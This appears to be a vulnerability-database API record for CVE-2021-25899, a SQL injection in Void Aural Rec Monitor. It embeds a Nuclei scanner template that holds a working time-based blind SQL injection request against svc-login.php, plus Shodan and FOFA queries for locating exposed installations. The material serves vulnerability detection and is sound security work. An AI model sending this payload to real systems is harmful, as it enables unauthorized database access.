{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2021-25899/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2021-25899/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2021-25899/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2021-25899/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2021-25899/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2021-25899"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2021-25899"
    }
  },
  "enrichments": {
    "cisa-kev": {
      "kev": false
    },
    "epss": {
      "epss": 0.12245,
      "kev": false,
      "percentile": 0.95994
    },
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2021/CVE-2021-25899.yaml",
      "nuclei_template_severity": "high",
      "nuclei_template_yaml": "id: CVE-2021-25899\n\ninfo:\n  name: Void Aural Rec Monitor 9.0.0.1 - SQL Injection\n  author: edoardottt\n  severity: high\n  description: |\n    Void Aural Rec Monitor 9.0.0.1 contains a SQL injection vulnerability in svc-login.php. An attacker can send a crafted HTTP request to perform a blind time-based SQL injection via the param1 parameter and thus possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n  impact: |\n    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n  remediation: |\n    Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in Void Aural Rec Monitor 9.0.0.1.\n  reference:\n    - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/all-your-databases-belong-to-me-a-blind-sqli-case-study/\n    - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=28765\n    - https://nvd.nist.gov/vuln/detail/CVE-2021-25899\n    - https://github.com/ARPSyndicate/kenzer-templates\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2021-25899\n    cwe-id: CWE-89\n    epss-score: 0.12245\n    epss-percentile: 0.95994\n    cpe: cpe:2.3:a:void:aurall_rec_monitor:9.0.0.1:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: void\n    product: aurall_rec_monitor\n    shodan-query:\n      - html:\"AURALL\"\n      - http.html:\"aurall\"\n    fofa-query: body=\"aurall\"\n  tags: time-based-sqli,cve2021,cve,sqli,void,aurall,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        @timeout: 15s\n        POST /AurallRECMonitor/services/svc-login.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        param1=dummy'+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))dummy)--+dummy&param2=test\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'duration>=7'\n          - 'status_code == 200'\n          - 'contains(content_type, \"text/html\")'\n          - 'contains(body, \"Contacte con el administrador\")'\n        condition: and\n# digest: 4b0a00483046022100cc02f7dbb94d0b928790d2fb85cc5108364670a8dbdb2e26ecc50c452ba649320221009df69c02ea2ac6a4cc71ebf9f327de852bbbd0758cfe2ae7b5695c4728fe5acc:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2021-25899"
}